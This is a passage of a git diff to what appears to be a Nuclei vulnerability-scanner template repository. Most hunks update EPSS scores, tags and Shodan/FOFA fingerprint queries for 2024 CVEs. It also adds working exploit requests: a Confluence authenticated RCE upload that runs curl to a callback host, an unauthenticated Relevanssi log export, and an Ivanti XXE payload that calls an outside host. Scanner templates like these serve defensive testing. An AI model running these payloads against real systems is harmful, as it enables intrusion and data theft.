\ No newline at end of file +# digest: 4b0a00483046022100ecd416627d1c6165d69bef643a983b65fafaabe6417bb79944e15af02b39b03f022100a5ed6b41e0bf5736e99ed54d1c1a53abe9956c3b773c3cf65c24507b7d2087eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml index 413103a138..370ab6089f 100644 --- a/http/cves/2024/CVE-2024-1061.yaml +++ b/http/cves/2024/CVE-2024-1061.yaml @@ -31,7 +31,7 @@ info: product: html5_video_player framework: wordpress fofa-query: "\"wordpress\" && body=\"html5-video-player\"" - tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player + tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins http: - method: GET @@ -45,4 +45,4 @@ http: - 'contains(header, "application/json")' - 'contains_all(body, "created_at", "video_id")' condition: and -# digest: 4a0a00473045022070156cf1af14d1844f0ca97c8ef395673a56630b05af2016c799cacc75015e6f022100961eeec2ecda1a713e896c60ec730e503954339759b3f64aacd2702e074bd745:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022067b13f93f5ef066473b8b51c46c6a613f73ddfbe77905aadaf2241b6d9c09263022100ba7baef034c81bce2b183e7abbdbec4b6dd0044f5aecba3a2bce8f4a0bc32481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1071.yaml b/http/cves/2024/CVE-2024-1071.yaml index 82c83ee6c6..9af7e23d84 100644 --- a/http/cves/2024/CVE-2024-1071.yaml +++ b/http/cves/2024/CVE-2024-1071.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-1071 cwe-id: CWE-89 epss-score: 0.00063 - epss-percentile: 0.24988 + epss-percentile: 0.26569 metadata: verified: true max-request: 2 @@ -27,7 +27,7 @@ info: fofa-query: body="/wp-content/plugins/ultimate-member" publicwww-query: "/wp-content/plugins/ultimate-member/" zoomeye-query: app:"WordPress Ultimate Member Plugin" - tags: cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin + tags: cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin,sqli http: - raw: @@ -61,4 +61,4 @@ http: regex: - '"nonce":"([0-9a-z]+)"' internal: true -# digest: 490a00463044022023025d307157dc2a97f59694d6703e6de5e5492820a9357d8a1a980e59010ca90220008b16687ffe30b37f8738816ab1e80fe8aacad0b5f8de07ac423c85f7146f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204dce0d46e23a96c4332c7141fb7eebb00ac6384853aaf8343276fe89d847988a022015a2c24b11feaf9425e5dd850e00a5ccff4ee8901419f9226029090d885ac9b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1183.yaml b/http/cves/2024/CVE-2024-1183.yaml index 06f1156ff3..ddaf958baa 100644 --- a/http/cves/2024/CVE-2024-1183.yaml +++ b/http/cves/2024/CVE-2024-1183.yaml @@ -14,8 +14,8 @@ info: cvss-score: 6.5 cve-id: CVE-2024-1183 cwe-id: CWE-601 - epss-score: 0.00061 - epss-percentile: 0.24702 + epss-score: 0.00076 + epss-percentile: 0.32361 metadata: verified: true max-request: 1 @@ -33,4 +33,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' part: header -# digest: 4a0a004730450221008fa9c24b03fedb13e37837ad2730bc20d6d973ad45a2d74dd82193fb651172c5022057ad36fe5c2c8f0f555f7106c808470d5cfc40e96a168c822c4cc96f1183df15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f8114233dc93d6f7f8756ef02b1f03954696a215009b10c4052a06421fe4250022100e565921ef3de19b35c2af7550b0d98f911333848805b11ad398ff151d6e4ce17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1208.yaml b/http/cves/2024/CVE-2024-1208.yaml index ba10347dd8..fe0ba91a62 100644 --- a/http/cves/2024/CVE-2024-1208.yaml +++ b/http/cves/2024/CVE-2024-1208.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-1208 - epss-score: 0.01024 - epss-percentile: 0.83462 + epss-score: 0.01217 + epss-percentile: 0.85275 cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: learndash product: learndash framework: wordpress + shodan-query: http.html:/wp-content/plugins/sfwd-lms + fofa-query: body=/wp-content/plugins/sfwd-lms publicwww-query: "/wp-content/plugins/sfwd-lms" google-query: inurl:"/wp-content/plugins/sfwd-lms" tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash @@ -53,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008abc475f7d30df3a6b98733b219dede7a70dfd1c97e3c2928672e8574552af7f022100a8e1793227c1e4bbb6a2b10ceca86cd1c109f5bd43330f357f2a4a10c9c78184:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100987c15b27dca0530370ddf701a23f7f9362d6ddefcc580e0b28aed2094875cbf022100a857d2efb505bae57670716f993ac50f4465f68593f007ab0ce7cb065a07565f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1209.yaml b/http/cves/2024/CVE-2024-1209.yaml index dc369cfd47..748a780ea5 100644 --- a/http/cves/2024/CVE-2024-1209.yaml +++ b/http/cves/2024/CVE-2024-1209.yaml @@ -11,10 +11,14 @@ info: - https://wpscan.com/vulnerability/f813a21d-7a6a-4ff4-a43c-3e2991a23c7f/ - https://github.com/karlemilnikka/CVE-2024-1209 - https://nvd.nist.gov/vuln/detail/CVE-2024-1209 + - https://www.learndash.com/release-notes/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7191955e-0db1-4ad1-878b-74f90ca59c91?source=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-1209 + epss-score: 0.01199 + epss-percentile: 0.85131 cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -22,6 +26,8 @@ info: vendor: learndash product: learndash framework: wordpress + shodan-query: http.html:/wp-content/plugins/sfwd-lms + fofa-query: body=/wp-content/plugins/sfwd-lms publicwww-query: "/wp-content/plugins/sfwd-lms" google-query: inurl:"/wp-content/plugins/sfwd-lms" tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash @@ -51,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220363799e96bf26f65aefc0de03e8fa5d4be7862d3bc87f1bd33ee217855e3541202204c371666413ff5962a77c1ef4ecfc419b2a00dec6859fc524b10dab24d46bc5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210088e37caea857081cdc0057cdd2571508327fa1fb7a077b2fb291421d2b3834b2022100d6040318aa37a2a7932b4cd6e6f83c853e77396dfa54c73d867ef92c039e72ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1210.yaml b/http/cves/2024/CVE-2024-1210.yaml index 9c975befa1..c5c9a101f9 100644 --- a/http/cves/2024/CVE-2024-1210.yaml +++ b/http/cves/2024/CVE-2024-1210.yaml @@ -11,10 +11,14 @@ info: - https://wpscan.com/vulnerability/f4b12179-3112-465a-97e1-314721f7fe3d/ - https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210 - https://nvd.nist.gov/vuln/detail/CVE-2024-1210 + - https://www.learndash.com/release-notes/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/61ca5ab6-5fe9-4313-9b0d-8736663d0e89?source=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-1210 + epss-score: 0.01199 + epss-percentile: 0.85131 cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +28,8 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/sfwd-lms" google-query: inurl:"/wp-content/plugins/sfwd-lms" + shodan-query: http.html:/wp-content/plugins/sfwd-lms + fofa-query: body=/wp-content/plugins/sfwd-lms tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash http: @@ -49,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204f99f7431a131299ee2561e6fb7bcc25f330b25ad1e06dd0679ced69336dc71c022100df619ceeef6954dc1b47304d723b9bfad50e69af08876232c9ef3159f9638438:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c80859e9500c040651b395581d3b3731a53c9bff54b209866749256a3b9f6411022100d846a7b23ffc3a21709bc5afc49c12f15cc45dad46cd5b8f257151c49916282d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml index eeec45de5e..0d0feb0582 100644 --- a/http/cves/2024/CVE-2024-1212.yaml +++ b/http/cves/2024/CVE-2024-1212.yaml @@ -17,8 +17,8 @@ info: cvss-score: 10 cve-id: CVE-2024-1212 cwe-id: CWE-78 - epss-score: 0.00721 - epss-percentile: 0.802 + epss-score: 0.00213 + epss-percentile: 0.59325 metadata: verified: true max-request: 1 @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c9fc29ea41909ec2bef545f7a4e29b165e9e11f14bade221b2ffc058c2c9051022100e36e3225d79c6a7ba704b8766c5603e5b2822e539c707a4f2a1a17052f2dfc47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8cb14bf9520061060c46e11d3791ffe34692d43161a7f26c48b42ee00ee9825022100956f14600e498f116c051bbb9247841a554650ce88f40b6142f4f16f0bc7deeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1380.yaml b/http/cves/2024/CVE-2024-1380.yaml new file mode 100644 index 0000000000..5b0fc54e84 --- /dev/null +++ b/http/cves/2024/CVE-2024-1380.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-1380 + +info: + name: Relevanssi (A Better Search) <= 4.22.0 - Query Log Export + author: FLX + severity: medium + description: | + The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. + remediation: Fixed in 4.22.1 + reference: + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail= + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve + - https://nvd.nist.gov/vuln/detail/CVE-2024-1380 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-1380 + epss-score: 0.00043 + epss-percentile: 0.0866 + metadata: + verified: true + max-request: 1 + fofa-query: "/wp-content/plugins/relevanssi/" + tags: cve,cve2024,wp,wordpress,wp-plugin,relevanssi,exposure + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=&relevanssi_export=1 + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(header, "filename=relevanssi_log.csv", "application/download")' + - 'contains_all(body, "user_id", "session_id")' + condition: and +# digest: 4a0a00473045022100fdca94211d49feac7affb79d5d4723404f97a0eec77a19696bfa855f008e7dd1022072ff0b48f53ad24ed15f081f510ce1875c489798ee413e581239d13760f79e45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index c46073a3cb..8efbfcfd40 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -15,19 +15,19 @@ info: - https://github.com/DiabloHTB/CVE-2024-1561 - https://nvd.nist.gov/vuln/detail/CVE-2024-1561 - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2 + - https://www.gradio.app/changelog#4-13-0 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-1561 cwe-id: CWE-29 - epss-score: 0.00045 - epss-percentile: 0.14639 + epss-score: 0.00087 + epss-percentile: 0.36659 metadata: verified: true max-request: 3 shodan-query: html:"__gradio_mode__" tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr - flow: http(1) && http(2) && http(3) http: @@ -71,4 +71,4 @@ http: - regex('root:.*:0:0:', body) - 'contains(header, "text/plain")' condition: and -# digest: 490a004630440220321f22e77b20acc61afa7b5cbf1f465becdb09178d7c23342a1d1be0a11c843502205a9d96fc3f2429ce7f2566dce2a289b2ff6529266cee50a0d24bd60336562f19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220228b8f9ed4c8b48faa786cd1c48413831ef219341e029831e13f0a25f92be8a902204ff8d692224fa018c063b78b72507ddf2e92f2a750fd3b5cd0c01bc2f32a762f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1709.yaml b/http/cves/2024/CVE-2024-1709.yaml index 8b034b70f7..0dde8cca52 100644 --- a/http/cves/2024/CVE-2024-1709.yaml +++ b/http/cves/2024/CVE-2024-1709.yaml @@ -11,20 +11,31 @@ info: - https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 - https://nvd.nist.gov/vuln/detail/CVE-2024-1709 + - https://github.com/rapid7/metasploit-framework/pull/18870 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2024-1709 - cwe-id: CWE-288 + cwe-id: CWE-288,NVD-CWE-Other + epss-score: 0.94464 + epss-percentile: 0.99213 + cpe: cpe:2.3:a:connectwise:screenconnect:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: connectwise product: screenconnect shodan-query: http.favicon.hash:-82958153 - fofa-query: app="ScreenConnect-Remote-Support-Software" - zoomeye-query: app:"ScreenConnect Remote Management Software" - hunter-query: app.name="ConnectWise ScreenConnect software" + fofa-query: + - app="ScreenConnect-Remote-Support-Software" + - app="screenconnect-remote-support-software" + - icon_hash=-82958153 + zoomeye-query: + - app:"ScreenConnect Remote Management Software" + - app:"screenconnect remote management software" + hunter-query: + - app.name="ConnectWise ScreenConnect software" + - app.name="connectwise screenconnect software" tags: cve,cve2024,screenconnect,connectwise,auth-bypass,kev variables: string: "{{rand_text_alpha(10)}}" @@ -52,4 +63,4 @@ http: part: header kval: - Server -# digest: 4b0a00483046022100df42d248b92130b0997228abe4ff00197ca95319ec494fcb457e36f99947b38b022100f14f62eb21d2dc5ebb6f7d9b2e3df0501572ace6e67a5cad42153418c3fae0b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bfab58b6db75722dda3352ea196c86075bdddc52baef061222e5e92ce305611002202d979aeba25d39e47d69411d8ccd3ce5cd62a9fbdd84f614c4092ae750d64658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-20767.yaml b/http/cves/2024/CVE-2024-20767.yaml index d57dff21dd..ec6496cc66 100644 --- a/http/cves/2024/CVE-2024-20767.yaml +++ b/http/cves/2024/CVE-2024-20767.yaml @@ -10,13 +10,15 @@ info: - https://jeva.cc/2973.html - https://nvd.nist.gov/vuln/detail/CVE-2024-20767 - https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html + - https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion + - https://github.com/Hatcat123/my_stars classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2024-20767 cwe-id: CWE-284 - epss-score: 0.00087 - epss-percentile: 0.35684 + epss-score: 0.08221 + epss-percentile: 0.94345 metadata: verified: true max-request: 2 @@ -51,4 +53,4 @@ http: regex: - "<var name='uuid'><string>(.*)</string>" internal: true -# digest: 4b0a00483046022100ae51132a490d9b1610ee3525362809c3c77ac5399cb74bd5070785b43cc2441e0221008bc1d323f198a3c3c0e615caceb32d4f55678113c27be537aeb55e5a329acb35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e6a9a13cc692e12629ce4b557e8a9cdaab2f6b3df9155e2bb4f5cac00241469b0220351a6751dda75fd857b8ac90f6cdca44f5853c3c3019070572245e97c7aec3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21644.yaml b/http/cves/2024/CVE-2024-21644.yaml index 4cb683498d..09b0403216 100644 --- a/http/cves/2024/CVE-2024-21644.yaml +++ b/http/cves/2024/CVE-2024-21644.yaml @@ -12,21 +12,36 @@ info: - https://github.com/advisories/GHSA-mqpq-2p68-46fv - https://github.com/fkie-cad/nvd-json-data-feeds - https://nvd.nist.gov/vuln/detail/CVE-2024-21644 + - https://github.com/ltranquility/CVE-2024-21644-Poc + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-21644 cwe-id: CWE-284 - epss-score: 0.41231 - epss-percentile: 0.97205 + epss-score: 0.14751 + epss-percentile: 0.95779 cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: pyload product: pyload - shodan-query: html:"pyload" - zoomeye-query: app:"pyLoad" + shodan-query: + - html:"pyload" + - http.title:"login - pyload" + - http.html:"pyload" + - http.title:"pyload" + fofa-query: + - title="login - pyload" + - body="pyload" + - title="pyload" + google-query: + - intitle:"login - pyload" + - intitle:"pyload" + zoomeye-query: + - app:"pyLoad" + - app:"pyload" tags: cve,cve2024,python,pip,pyload,access-control http: @@ -46,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f302e5b4df6df2065372cf020665c535b9de6c08a15a2c78c955109b9ab285c4022100e42e3025cf3b53f97264dab0c19a74e110d62d5fdcd038986cc4c6c3408f2004:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c36c417506bb3f8110e97a42eed93e6ac5da4f99f506c1998f60c08991af5ffd0220646ccab7ed81816c53a24a7e224f85480706d10c52a4c14fa1a8973115a5d900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21645.yaml b/http/cves/2024/CVE-2024-21645.yaml index 78b42790ec..2d16e73726 100644 --- a/http/cves/2024/CVE-2024-21645.yaml +++ b/http/cves/2024/CVE-2024-21645.yaml @@ -17,15 +17,27 @@ info: cvss-score: 5.3 cve-id: CVE-2024-21645 cwe-id: CWE-74 - epss-score: 0.00046 - epss-percentile: 0.13723 + epss-score: 0.0112 + epss-percentile: 0.84559 cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: pyload product: pyload - shodan-query: "title:\"pyload\"" + shodan-query: + - "title:\"pyload\"" + - http.title:"login - pyload" + - http.html:"pyload" + - http.title:"pyload" + fofa-query: + - title="login - pyload" + - body="pyload" + - title="pyload" + google-query: + - intitle:"login - pyload" + - intitle:"pyload" + zoomeye-query: app:"pyload" tags: cve,cve2024,pyload,authenticated,injection variables: str: "{{rand_base(6)}}" @@ -59,4 +71,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022021729634e85ce3cca856b22c561467945ed9ed3bf435485b3256804092dc4ae90220233d82fed78afeb8e07ab2442277d3b206acbd3f928ca900fed17ce0ba29b641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f29eb6f5173374ac2b8c49e46593b07e1aedca557c094c6eb845239d5c104f2902205331b2652cb0041d7d04876cf28d36c1ccfbabfb52900d5028595c101bac256e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml new file mode 100644 index 0000000000..98f36fa39e --- /dev/null +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -0,0 +1,72 @@ +id: CVE-2024-21683 + +info: + name: Atlassian Confluence Data Center and Server - Remote Code Execution + author: pdresearch + severity: high + description: | + Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code. + reference: + - https://confluence.atlassian.com/security/security-bulletin-may-21-2024-1387867145.html + - https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated + - https://nvd.nist.gov/vuln/detail/CVE-2024-21683 + - https://confluence.atlassian.com/pages/viewpage.action?pageId=1387867145 + - https://jira.atlassian.com/browse/CONFSERVER-95832 + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 8.3 + cve-id: CVE-2024-21683 + cwe-id: CWE-78 + epss-score: 0.00043 + epss-percentile: 0.0866 + metadata: + verified: true + max-request: 3 + fofa-query: "app=\"ATLASSIAN-Confluence\"" + tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive +variables: + username: "{{username}}" + password: "{{password}}" + +http: + - raw: + - | + POST /dologin.action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + os_username={{username}}&os_password={{password}}&login=Log+in&os_destination= + + - | + POST /doauthenticate.action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + X-Atlassian-Token: no-check + + password={{password}}&authenticate=Confirm&destination=%2Fadmin%2Fplugins%2Fnewcode%2Faddlanguage.action + + - | + POST /admin/plugins/newcode/addlanguage.action HTTP/1.1 + Host: {{Hostname}} + X-Atlassian-Token: no-check + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFcBwsDjo5LkYWGWE + + ------WebKitFormBoundaryFcBwsDjo5LkYWGWE + Content-Disposition: form-data; name="languageFile";filename="{{randstr}}.js" + Content-type: text/javascript + + new java.lang.ProcessBuilder["(java.lang.String[])"](["curl","{{interactsh-url}}"]).start() + ------WebKitFormBoundaryFcBwsDjo5LkYWGWE + Content-Disposition: form-data; name="newLanguageName" + + {{randstr}} + ------WebKitFormBoundaryFcBwsDjo5LkYWGWE-- + + matchers: + - type: dsl + dsl: + - status_code_1 == 302 && status_code_2 == 302 + - contains(interactsh_protocol, 'dns') + - contains(body_3, "confluence") + condition: and +# digest: 4b0a00483046022100c28962a7e265cc6de6b2f4ff178c62e7cf092b4f48154a8007dbd880ce7ebb64022100c14be3544d81d99ae0f2196c504637e743b2148ad6f655ef7c311cbb8f7419a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml index 700c4f220d..6674db6ce8 100644 --- a/http/cves/2024/CVE-2024-21887.yaml +++ b/http/cves/2024/CVE-2024-21887.yaml @@ -16,15 +16,22 @@ info: cvss-score: 9.1 cve-id: CVE-2024-21887 cwe-id: CWE-77 - epss-score: 0.97322 - epss-percentile: 0.99871 + epss-score: 0.97334 + epss-percentile: 0.99886 cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ivanti product: connect_secure - shodan-query: "html:\"welcome.cgi?p=logo\"" - tags: cve,cve2024,kev,rce,ivanti + shodan-query: + - "html:\"welcome.cgi?p=logo\"" + - http.title:"ivanti connect secure" + - http.html:"welcome.cgi?p=logo" + fofa-query: + - body="welcome.cgi?p=logo" + - title="ivanti connect secure" + google-query: intitle:"ivanti connect secure" + tags: packetstorm,cve,cve2024,kev,rce,ivanti http: - raw: @@ -50,4 +57,4 @@ http: - '"result":' - '"message":' condition: and -# digest: 4a0a004730450221008b11fb4caa72e93adcd3d6b4881baab60260caf734506dbeee298619d8a45db302205572b212a5aed50300f75693d3e4a74f34ee40ed420c6a4f2f83ded92f8699b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203589440c84513b0f0c1875e09acffb10daecff9b623ee109bc5457ffa0e5e6c4022100a6ce341b46f5eb47bff2eac39e50912943c63bf39f263790afc5c862480d10a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21893.yaml b/http/cves/2024/CVE-2024-21893.yaml index 0727b749b5..4e590f1f82 100644 --- a/http/cves/2024/CVE-2024-21893.yaml +++ b/http/cves/2024/CVE-2024-21893.yaml @@ -24,7 +24,14 @@ info: max-request: 1 vendor: ivanti product: connect_secure - shodan-query: "html:\"welcome.cgi?p=logo\"" + shodan-query: + - "html:\"welcome.cgi?p=logo\"" + - http.title:"ivanti connect secure" + - http.html:"welcome.cgi?p=logo" + fofa-query: + - body="welcome.cgi?p=logo" + - title="ivanti connect secure" + google-query: intitle:"ivanti connect secure" tags: cve,cve2024,kev,ssrf,ivanti http: @@ -48,4 +55,4 @@ http: - '/dana-na/' - 'WriteCSS' condition: and -# digest: 4b0a00483046022100a797d4c0fc87aff6583e71171c6d273e3f085bb60230c59a4a66e25d192d82d5022100a7a07c9ff12e69f386f9e2c80c1c134ea79bb8969038a584f32354d05de18618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b3695799a584f98633838b13b9769a5687d13aba92c44ba67b17b354c0190ff6022100b4876a07281da0b8a36e78aa6db223ed105709ec81082577e5c847371ec324c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22024.yaml b/http/cves/2024/CVE-2024-22024.yaml index 2dd07ad283..5004b0bc4c 100644 --- a/http/cves/2024/CVE-2024-22024.yaml +++ b/http/cves/2024/CVE-2024-22024.yaml @@ -17,9 +17,15 @@ info: max-request: 1 vendor: ivanti product: connect_secure - shodan-query: "html:\"welcome.cgi?p=logo\"" + shodan-query: + - "html:\"welcome.cgi?p=logo\"" + - http.title:"ivanti connect secure" + - http.html:"welcome.cgi?p=logo" + fofa-query: + - body="welcome.cgi?p=logo" + - title="ivanti connect secure" + google-query: intitle:"ivanti connect secure" tags: cve,cve2024,xxe,ivanti - variables: payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://{{interactsh-url}}/x"> %watchTowr;]><r></r>' @@ -46,4 +52,4 @@ http: - '/dana-na/' - 'WriteCSS' condition: and -# digest: 4b0a00483046022100e9957e443991b0960713b78c4fe96492cf6b6d9c5d70a45a77c8946752f125d1022100aba7f397b618737db6ab5865122dac0d1eab63346e36dc40656a995e97cbb619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022064dfea002db32f325d2a6eb8b2611463d76db7ac1f5dfd008ad98fc469f8af9102202351431f37385f4819eda1fc126a5f723e1c525b7a99a88c5628f5f0a53e45a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22319.yaml b/http/cves/2024/CVE-2024-22319.yaml index 71c5bc0edc..1fe460df4c 100644 --- a/http/cves/2024/CVE-2024-22319.yaml +++ b/http/cves/2024/CVE-2024-22319.yaml @@ -11,16 +11,21 @@ info: cvss-score: 9.8 cve-id: CVE-2024-22319 cwe-id: CWE-74 - epss-score: 0.00283 - epss-percentile: 0.67752 + epss-score: 0.29329 + epss-percentile: 0.96896 cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: ibm product: operational_decision_manager - shodan-query: html:"IBM ODM" - fofa-query: title="IBM ODM" + shodan-query: + - html:"IBM ODM" + - http.html:"ibm odm" + fofa-query: + - title="IBM ODM" + - title="ibm odm" + - body="ibm odm" tags: cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce http: @@ -36,4 +41,4 @@ http: - 'contains(body, "patchLevel\":")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100bd482d70c6c93cf274bdde0ad6aefa255e1e20edcff44034afb21a45d3fc96e802204f0c9289a94160d4606e60e859ca554ead9d6b21a8441a9d9bf065ec7f9f3cd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8191ca66f6400061c6b59b356a53ce3b95da2f03775b47440ed93a01753a41c022100c889c9b69b82421a875219849c974134fc1444ae169eb208b85fa7100c78dff2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22320.yaml b/http/cves/2024/CVE-2024-22320.yaml index 9bfaf8ff89..8847e95057 100644 --- a/http/cves/2024/CVE-2024-22320.yaml +++ b/http/cves/2024/CVE-2024-22320.yaml @@ -22,8 +22,13 @@ info: max-request: 1 vendor: ibm product: operational_decision_manager - shodan-query: html:"IBM ODM" - fofa-query: title="IBM ODM" + shodan-query: + - html:"IBM ODM" + - http.html:"ibm odm" + fofa-query: + - title="IBM ODM" + - title="ibm odm" + - body="ibm 